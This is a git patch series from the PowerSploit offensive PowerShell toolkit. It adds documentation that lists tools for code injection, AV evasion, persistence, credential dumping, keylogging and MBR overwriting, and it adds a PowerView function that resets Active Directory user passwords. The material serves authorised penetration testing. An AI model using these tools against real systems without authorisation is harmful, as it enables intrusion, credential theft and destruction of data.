From 9033f2f544785573f5924e6843d709193321c644 Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Mon, 12 Dec 2016 21:58:50 -0500 Subject: Another try at getting readthedocs.io working --- docs/index.md | 264 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 264 insertions(+) create mode 100644 docs/index.md (limited to 'docs/index.md') diff --git a/docs/index.md b/docs/index.md new file mode 100644 index 0000000..c348b9e --- /dev/null +++ b/docs/index.md @@ -0,0 +1,264 @@ +### PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: + +## CodeExecution + +**Execute code on a target machine.** + +#### `Invoke-DllInjection` + +Injects a Dll into the process ID of your choosing. + +#### `Invoke-ReflectivePEInjection` + +Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + +#### `Invoke-Shellcode` + +Injects shellcode into the process ID of your choosing or within PowerShell locally. + +#### `Invoke-WmiCommand` + +Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel. + +## ScriptModification + +**Modify and/or prepare scripts for execution on a compromised machine.** + +#### `Out-EncodedCommand` + +Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. + +#### `Out-CompressedDll` + +Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. + +#### `Out-EncryptedScript` + +Encrypts text files/scripts. + +#### `Remove-Comments` + +Strips comments and extra whitespace from a script. + +## Persistence + +**Add persistence capabilities to a PowerShell script** + +#### `New-UserPersistenceOption` + +Configure user-level persistence options for the Add-Persistence function. + +#### `New-ElevatedPersistenceOption` + +Configure elevated persistence options for the Add-Persistence function. + +#### `Add-Persistence` + +Add persistence capabilities to a script. + +#### `Install-SSP` + +Installs a security support provider (SSP) dll. + +#### `Get-SecurityPackages` + +Enumerates all loaded security packages (SSPs). + +## AntivirusBypass + +**AV doesn't stand a chance against PowerShell!** + +#### `Find-AVSignature` + +Locates single Byte AV signatures utilizing the same method as DSplit from "class101". + +## Exfiltration + +**All your data belong to me!** + +#### `Invoke-TokenManipulation` + +Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. + +#### `Invoke-CredentialInjection` + +Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). + +#### `Invoke-NinjaCopy` + +Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. + +#### `Invoke-Mimikatz` + +Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. + +#### `Get-Keystrokes` + +Logs keys pressed, time and the active window. + +#### `Get-GPPPassword` + +Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. + +#### `Get-GPPAutologon` + +Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. + +#### `Get-TimedScreenshot` + +A function that takes screenshots at a regular interval and saves them to a folder. + +#### `New-VolumeShadowCopy` + +Creates a new volume shadow copy. + +#### `Get-VolumeShadowCopy` + +Lists the device paths of all local volume shadow copies. + +#### `Mount-VolumeShadowCopy` + +Mounts a volume shadow copy. + +#### `Remove-VolumeShadowCopy` + +Deletes a volume shadow copy. + +#### `Get-VaultCredential` + +Displays Windows vault credential objects including cleartext web credentials. + +#### `Out-Minidump` + +Generates a full-memory minidump of a process. + +#### 'Get-MicrophoneAudio' + +Records audio from system microphone and saves to disk + +## Mayhem + +**Cause general mayhem with PowerShell.** + +#### `Set-MasterBootRecord` + +Proof of concept code that overwrites the master boot record with the + message of your choice. + +#### `Set-CriticalProcess` + +Causes your machine to blue screen upon exiting PowerShell. + +## Privesc + +**Tools to help with escalating privileges on a target.** + +#### `PowerUp` + +Clearing house of common privilege escalation checks, along with some weaponization vectors. + +## Recon + +**Tools to aid in the reconnaissance phase of a penetration test.** + +#### `Invoke-Portscan` + +Does a simple port scan using regular sockets, based (pretty) loosely on nmap. + +#### `Get-HttpStatus` + +Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. + +#### `Invoke-ReverseDnsLookup` + +Scans an IP address range for DNS PTR records. + +#### `PowerView` + +PowerView is series of functions that performs network and Windows domain enumeration and exploitation. + +## Recon\Dictionaries + +**A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.** + +* admin.txt - +* generic.txt - +* sharepoint.txt - + +## License + +The PowerSploit project and all individual scripts are under the [BSD 3-Clause license](https://raw.github.com/mattifestation/PowerSploit/master/LICENSE) unless explicitly noted otherwise. + +## Usage + +Refer to the comment-based help in each individual script for detailed usage information. + +To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module PowerSploit` + +To see the commands imported, type `Get-Command -Module PowerSploit` + +If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner: +`$Env:PSModulePath.Split(';') | + % { if ( Test-Path (Join-Path $_ PowerSploit) ) + {Get-ChildItem $_ -Recurse | Unblock-File} }` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. + +## Contribution Rules + +We need contributions! If you have a great idea for PowerSploit, we'd love to add it. New additions will require the following: + +* The script must adhere to the style guide. Any exceptions to the guide line would need an explicit, valid reason. +* The module manifest needs to be updated to reflect the new function being added. +* A brief description of the function should be added to this README.md +* Pester tests must accompany all new functions. See the Tests folder for examples but we are looking for tests that at least cover the basics by testing for expected/unexpected input/output and that the function exhibits desired functionality. Make sure the function is passing all tests (preferably in mutiple OSes) prior to submitting a pull request. Thanks! + +## Script Style Guide + +**For all contributors and future contributors to PowerSploit, I ask that you follow this style guide when writing your scripts/modules.** + +* Avoid Write-Host **at all costs**. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles: + * + * + +* If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'. + +* Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license). + +* Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis. + +* I prefer that variable names be capitalized and be as descriptive as possible. + +* Provide logical spacing in between your code. Indent your code to make it more readable. + +* If you find yourself repeating code, write a function. + +* Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error. + +* If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible. + +* Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to. + +* PowerShell v2 compatibility is highly desired. + +* Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following: + * `[Parameter(Position = 0, Mandatory = $True)]` + +* Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias. + +* Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break. + +* Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader. + +* Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement. + +* Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters. + +* If a script creates complex custom objects, include a ps1xml file that will properly format the object's output. -- cgit v1.2.3 From f4f5fb1460a8163e333c9e5462df6d3ab27a53a6 Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Tue, 13 Dec 2016 16:00:28 -0500 Subject: Added Set-DomainUserPassword to reset a particular user's password. Reformatted documentation. --- README.md | 2 +- Recon/PowerView.ps1 | 113 ++++++++++++++++++ Recon/README.md | 1 + Recon/Recon.psd1 | 1 + docs/Recon/Set-DomainUserPassword.md | 127 ++++++++++++++++++++ docs/Recon/index.md | 14 --- docs/index.md | 223 +++++++++-------------------------- mkdocs.yml | 1 + 8 files changed, 298 insertions(+), 184 deletions(-) create mode 100755 docs/Recon/Set-DomainUserPassword.md (limited to 'docs/index.md') diff --git a/README.md b/README.md index c348b9e..60ac90f 100644 --- a/README.md +++ b/README.md @@ -132,7 +132,7 @@ Displays Windows vault credential objects including cleartext web credentials. Generates a full-memory minidump of a process. -#### 'Get-MicrophoneAudio' +#### `Get-MicrophoneAudio` Records audio from system microphone and saves to disk diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1 index 32aa10f..5d404f3 100755 --- a/Recon/PowerView.ps1 +++ b/Recon/PowerView.ps1 @@ -4894,6 +4894,119 @@ http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices- } +function Set-DomainUserPassword { +<# +.SYNOPSIS + +Sets the password for a given user identity and returns the user object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified user -Identity, +which returns a DirectoryServices.AccountManagement.UserPrincipal object. The +SetPassword() function is then invoked on the user, setting the password to -AccountPassword. + +.PARAMETER Identity + +A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +specifying the user to reset the password for. + +.PARAMETER AccountPassword + +Specifies the password to reset the target user's to. Mandatory. + +.PARAMETER Domain + +Specifies the domain to use to search for the user identity, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword + +Resets the password for 'andy' to the password specified. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred + +Resets the password for 'andy' usering the alternate credentials specified. + +.OUTPUTS + +DirectoryServices.AccountManagement.UserPrincipal + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.UserPrincipal')] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('UserName', 'UserIdentity', 'User')] + [String] + $Identity, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Password')] + [Security.SecureString] + $AccountPassword, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ 'Identity' = $Identity } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity) + + if ($User) { + Write-Verbose "[Set-DomainUserPassword] Attempting to set the password for user '$Identity'" + try { + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + + $Null = $User.Save() + Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset" + $User + } + catch { + Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_" + } + } + else { + Write-Warning "[Set-DomainUserPassword] Unable to find user '$Identity'" + } + } +} + + function Get-DomainUserEvent { <# .SYNOPSIS diff --git a/Recon/README.md b/Recon/README.md index acc2627..7fcacc5 100644 --- a/Recon/README.md +++ b/Recon/README.md @@ -58,6 +58,7 @@ an array of hosts from the pipeline. Find-DomainObjectPropertyOutlier- inds user/group/computer objects in AD that have 'outlier' properties set Get-DomainUser - return all users or specific user objects in AD New-DomainUser - creates a new domain user (assuming appropriate permissions) and returns the user object + Set-DomainUserPassword - sets the password for a given user identity and returns the user object Get-DomainUserEvent - enumerates account logon events (ID 4624) and Logon with explicit credential events Get-DomainComputer - returns all computers or specific computer objects in AD Get-DomainObject - returns all (or specified) domain objects in AD diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index 6cdcfba..7e2abcb 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -46,6 +46,7 @@ FunctionsToExport = @( 'Find-DomainObjectPropertyOutlier', 'Get-DomainUser', 'New-DomainUser', + 'Set-DomainUserPassword', 'Get-DomainUserEvent', 'Get-DomainComputer', 'Get-DomainObject', diff --git a/docs/Recon/Set-DomainUserPassword.md b/docs/Recon/Set-DomainUserPassword.md new file mode 100755 index 0000000..1712294 --- /dev/null +++ b/docs/Recon/Set-DomainUserPassword.md @@ -0,0 +1,127 @@ +# Set-DomainUserPassword + +## SYNOPSIS +Sets the password for a given user identity and returns the user object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +Set-DomainUserPassword [-Identity] -AccountPassword [-Domain ] + [-Credential ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified user -Identity, +which returns a DirectoryServices.AccountManagement.UserPrincipal object. +The +SetPassword() function is then invoked on the user, setting the password to -AccountPassword. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword + +Resets the password for 'andy' to the password specified. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred + +Resets the password for 'andy' usering the alternate credentials specified. + +## PARAMETERS + +### -Identity +A user SamAccountName (e.g. +User1), DistinguishedName (e.g. +CN=user1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +specifying the user to reset the password for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: UserName, UserIdentity, User + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AccountPassword +Specifies the password to reset the target user's to. +Mandatory. + +```yaml +Type: SecureString +Parameter Sets: (All) +Aliases: Password + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for the user identity, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.UserPrincipal + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/index.md b/docs/Recon/index.md index acc2627..b3eca5c 100644 --- a/docs/Recon/index.md +++ b/docs/Recon/index.md @@ -1,17 +1,3 @@ -To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. - -The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" -The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" - -To use the module, type `Import-Module Recon` - -To see the commands imported, type `Get-Command -Module Recon` - -For help on each individual command, Get-Help is your friend. - -Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. - - ## PowerView PowerView is a PowerShell tool to gain network situational awareness on diff --git a/docs/index.md b/docs/index.md index c348b9e..67ddcbc 100644 --- a/docs/index.md +++ b/docs/index.md @@ -1,189 +1,74 @@ -### PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: +## Overview +PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. -## CodeExecution +### CodeExecution +Execute code on a target machine. -**Execute code on a target machine.** + Invoke-DllInjection - Injects a Dll into the process ID of your choosing. + Invoke-ReflectivePEInjection - Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + Invoke-Shellcode - Injects shellcode into the process ID of your choosing or within PowerShell locally. + Invoke-WmiCommand - Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel -#### `Invoke-DllInjection` +### ScriptModification +Modify and/or prepare scripts for execution on a compromised machine. -Injects a Dll into the process ID of your choosing. + Out-EncodedCommand - Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. + Out-CompressedDll - Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. + Out-EncryptedScript - Encrypts text files/scripts. + Remove-Comments - Strips comments and extra whitespace from a script. -#### `Invoke-ReflectivePEInjection` +### Persistence -Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. +Add persistence capabilities to a PowerShell script. -#### `Invoke-Shellcode` + New-UserPersistenceOption - Configure user-level persistence options for the Add-Persistence function. + New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function. + Add-Persistence - Add persistence capabilities to a script. + Install-SSP - Installs a security support provider (SSP) dll. + Get-SecurityPackages - Enumerates all loaded security packages (SSPs). -Injects shellcode into the process ID of your choosing or within PowerShell locally. +### AntivirusBypass +AV doesn't stand a chance against PowerShell! -#### `Invoke-WmiCommand` + Find-AVSignature - Locates single Byte AV signatures utilizing the same method as DSplit from "class101". -Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel. +### Exfiltration +All your data belong to me! -## ScriptModification + Invoke-TokenManipulation - Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. + Invoke-CredentialInjection - Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). + Invoke-NinjaCopy - Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. + Invoke-Mimikatz - Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. + Get-Keystrokes - Logs keys pressed, time and the active window. + Get-GPPPassword - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. + Get-GPPAutologon - Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. + Get-TimedScreenshot - A function that takes screenshots at a regular interval and saves them to a folder. + New-VolumeShadowCopy - Creates a new volume shadow copy. + Get-VolumeShadowCopy - Lists the device paths of all local volume shadow copies. + Mount-VolumeShadowCopy - Mounts a volume shadow copy. + Remove-VolumeShadowCopy - Deletes a volume shadow copy. + Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials. + Out-Minidump - Generates a full-memory minidump of a process. + Get-MicrophoneAudio - Records audio from system microphone and saves to disk. -**Modify and/or prepare scripts for execution on a compromised machine.** +### Mayhem +Cause general mayhem with PowerShell. -#### `Out-EncodedCommand` + Set-MasterBootRecord - Proof of concept code that overwrites the master boot record with the message of your choice. + Set-CriticalProcess - Causes your machine to blue screen upon exiting PowerShell. -Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. +### Privesc +Tools to help with escalating privileges on a target, including PowerUp. -#### `Out-CompressedDll` + PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors. -Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. +### Recon +Tools to aid in the reconnaissance phase of a penetration test, including PowerView. -#### `Out-EncryptedScript` - -Encrypts text files/scripts. - -#### `Remove-Comments` - -Strips comments and extra whitespace from a script. - -## Persistence - -**Add persistence capabilities to a PowerShell script** - -#### `New-UserPersistenceOption` - -Configure user-level persistence options for the Add-Persistence function. - -#### `New-ElevatedPersistenceOption` - -Configure elevated persistence options for the Add-Persistence function. - -#### `Add-Persistence` - -Add persistence capabilities to a script. - -#### `Install-SSP` - -Installs a security support provider (SSP) dll. - -#### `Get-SecurityPackages` - -Enumerates all loaded security packages (SSPs). - -## AntivirusBypass - -**AV doesn't stand a chance against PowerShell!** - -#### `Find-AVSignature` - -Locates single Byte AV signatures utilizing the same method as DSplit from "class101". - -## Exfiltration - -**All your data belong to me!** - -#### `Invoke-TokenManipulation` - -Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. - -#### `Invoke-CredentialInjection` - -Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). - -#### `Invoke-NinjaCopy` - -Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. - -#### `Invoke-Mimikatz` - -Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. - -#### `Get-Keystrokes` - -Logs keys pressed, time and the active window. - -#### `Get-GPPPassword` - -Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. - -#### `Get-GPPAutologon` - -Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. - -#### `Get-TimedScreenshot` - -A function that takes screenshots at a regular interval and saves them to a folder. - -#### `New-VolumeShadowCopy` - -Creates a new volume shadow copy. - -#### `Get-VolumeShadowCopy` - -Lists the device paths of all local volume shadow copies. - -#### `Mount-VolumeShadowCopy` - -Mounts a volume shadow copy. - -#### `Remove-VolumeShadowCopy` - -Deletes a volume shadow copy. - -#### `Get-VaultCredential` - -Displays Windows vault credential objects including cleartext web credentials. - -#### `Out-Minidump` - -Generates a full-memory minidump of a process. - -#### 'Get-MicrophoneAudio' - -Records audio from system microphone and saves to disk - -## Mayhem - -**Cause general mayhem with PowerShell.** - -#### `Set-MasterBootRecord` - -Proof of concept code that overwrites the master boot record with the - message of your choice. - -#### `Set-CriticalProcess` - -Causes your machine to blue screen upon exiting PowerShell. - -## Privesc - -**Tools to help with escalating privileges on a target.** - -#### `PowerUp` - -Clearing house of common privilege escalation checks, along with some weaponization vectors. - -## Recon - -**Tools to aid in the reconnaissance phase of a penetration test.** - -#### `Invoke-Portscan` - -Does a simple port scan using regular sockets, based (pretty) loosely on nmap. - -#### `Get-HttpStatus` - -Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. - -#### `Invoke-ReverseDnsLookup` - -Scans an IP address range for DNS PTR records. - -#### `PowerView` - -PowerView is series of functions that performs network and Windows domain enumeration and exploitation. - -## Recon\Dictionaries - -**A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.** - -* admin.txt - -* generic.txt - -* sharepoint.txt - + Invoke-Portscan - Does a simple port scan using regular sockets, based (pretty) loosely on nmap. + Get-HttpStatus - Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. + Invoke-ReverseDnsLookup - Scans an IP address range for DNS PTR records. + PowerView - PowerView is series of functions that performs network and Windows domain enumeration and exploitation. ## License diff --git a/mkdocs.yml b/mkdocs.yml index fb9ad52..fcaef8d 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -29,6 +29,7 @@ pages: - Find-DomainObjectPropertyOutlier: 'Recon/Find-DomainObjectPropertyOutlier.md' - Get-DomainUser: 'Recon/Get-DomainUser.md' - New-DomainUser: 'Recon/New-DomainUser.md' + - Set-DomainUserPassword: 'Recon/Set-DomainUserPassword.md' - Get-DomainUserEvent: 'Recon/Get-DomainUserEvent.md' - Get-DomainComputer: 'Recon/Get-DomainComputer.md' - Get-DomainObject: 'Recon/Get-DomainObject.md' -- cgit v1.2.3 From 7964823e3f398c41a7ad1c0e8c4c28c0806a9c0d Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Wed, 14 Dec 2016 11:53:29 -0500 Subject: Added documentation for PowerUp --- Privesc/PowerUp.ps1 | 190 ++++++++++----------- Privesc/Privesc.psd1 | 43 +++-- Privesc/README.md | 22 +-- docs/Privesc/Add-ServiceDacl.md | 68 ++++++++ docs/Privesc/Enable-Privilege.md | 105 ++++++++++++ docs/Privesc/Find-PathDLLHijack.md | 45 +++++ docs/Privesc/Find-ProcessDLLHijack.md | 127 ++++++++++++++ docs/Privesc/Get-ApplicationHost.md | 95 +++++++++++ docs/Privesc/Get-CachedGPPPassword.md | 55 ++++++ docs/Privesc/Get-ModifiablePath.md | 102 ++++++++++++ docs/Privesc/Get-ModifiableRegistryAutoRun.md | 44 +++++ docs/Privesc/Get-ModifiableScheduledTaskFile.md | 45 +++++ docs/Privesc/Get-ModifiableService.md | 40 +++++ docs/Privesc/Get-ModifiableServiceFile.md | 45 +++++ docs/Privesc/Get-ProcessTokenGroup.md | 114 +++++++++++++ docs/Privesc/Get-ProcessTokenPrivilege.md | 131 +++++++++++++++ docs/Privesc/Get-RegistryAlwaysInstallElevated.md | 45 +++++ docs/Privesc/Get-RegistryAutoLogon.md | 44 +++++ docs/Privesc/Get-ServiceDetail.md | 65 ++++++++ docs/Privesc/Get-SiteListPassword.md | 96 +++++++++++ docs/Privesc/Get-System.md | 172 +++++++++++++++++++ docs/Privesc/Get-UnattendedInstallFile.md | 44 +++++ docs/Privesc/Get-UnquotedService.md | 45 +++++ docs/Privesc/Get-WebConfig.md | 93 +++++++++++ docs/Privesc/Install-ServiceBinary.md | 175 +++++++++++++++++++ docs/Privesc/Invoke-PrivescAudit.md | 63 +++++++ docs/Privesc/Invoke-ServiceAbuse.md | 194 ++++++++++++++++++++++ docs/Privesc/Invoke-WScriptUACBypass.md | 85 ++++++++++ docs/Privesc/Restore-ServiceBinary.md | 87 ++++++++++ docs/Privesc/Set-ServiceBinaryPath.md | 92 ++++++++++ docs/Privesc/Test-ServiceDaclPermission.md | 112 +++++++++++++ docs/Privesc/Write-HijackDll.md | 173 +++++++++++++++++++ docs/Privesc/Write-ServiceBinary.md | 191 +++++++++++++++++++++ docs/Privesc/Write-UserAddMSI.md | 56 +++++++ docs/Privesc/index.md | 55 ++++++ docs/index.md | 1 + mkdocs.yml | 34 ++++ 37 files changed, 3067 insertions(+), 126 deletions(-) create mode 100755 docs/Privesc/Add-ServiceDacl.md create mode 100755 docs/Privesc/Enable-Privilege.md create mode 100755 docs/Privesc/Find-PathDLLHijack.md create mode 100755 docs/Privesc/Find-ProcessDLLHijack.md create mode 100755 docs/Privesc/Get-ApplicationHost.md create mode 100755 docs/Privesc/Get-CachedGPPPassword.md create mode 100755 docs/Privesc/Get-ModifiablePath.md create mode 100755 docs/Privesc/Get-ModifiableRegistryAutoRun.md create mode 100755 docs/Privesc/Get-ModifiableScheduledTaskFile.md create mode 100755 docs/Privesc/Get-ModifiableService.md create mode 100755 docs/Privesc/Get-ModifiableServiceFile.md create mode 100755 docs/Privesc/Get-ProcessTokenGroup.md create mode 100755 docs/Privesc/Get-ProcessTokenPrivilege.md create mode 100755 docs/Privesc/Get-RegistryAlwaysInstallElevated.md create mode 100755 docs/Privesc/Get-RegistryAutoLogon.md create mode 100755 docs/Privesc/Get-ServiceDetail.md create mode 100755 docs/Privesc/Get-SiteListPassword.md create mode 100755 docs/Privesc/Get-System.md create mode 100755 docs/Privesc/Get-UnattendedInstallFile.md create mode 100755 docs/Privesc/Get-UnquotedService.md create mode 100755 docs/Privesc/Get-WebConfig.md create mode 100755 docs/Privesc/Install-ServiceBinary.md create mode 100755 docs/Privesc/Invoke-PrivescAudit.md create mode 100755 docs/Privesc/Invoke-ServiceAbuse.md create mode 100755 docs/Privesc/Invoke-WScriptUACBypass.md create mode 100755 docs/Privesc/Restore-ServiceBinary.md create mode 100755 docs/Privesc/Set-ServiceBinaryPath.md create mode 100755 docs/Privesc/Test-ServiceDaclPermission.md create mode 100755 docs/Privesc/Write-HijackDll.md create mode 100755 docs/Privesc/Write-ServiceBinary.md create mode 100755 docs/Privesc/Write-UserAddMSI.md create mode 100644 docs/Privesc/index.md (limited to 'docs/index.md') diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1 index 6fffef0..8ad9044 100644 --- a/Privesc/PowerUp.ps1 +++ b/Privesc/PowerUp.ps1 @@ -739,9 +739,9 @@ function Get-ModifiablePath { Parses a passed string containing multiple possible file/folder paths and returns the file paths where the current user has modification rights. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -935,9 +935,9 @@ function Get-TokenInformation { Helpers that returns token groups or privileges for a passed process/thread token. Used by Get-ProcessTokenGroup and Get-ProcessTokenPrivilege. -Author: Will Schroeder (@harmj0y) 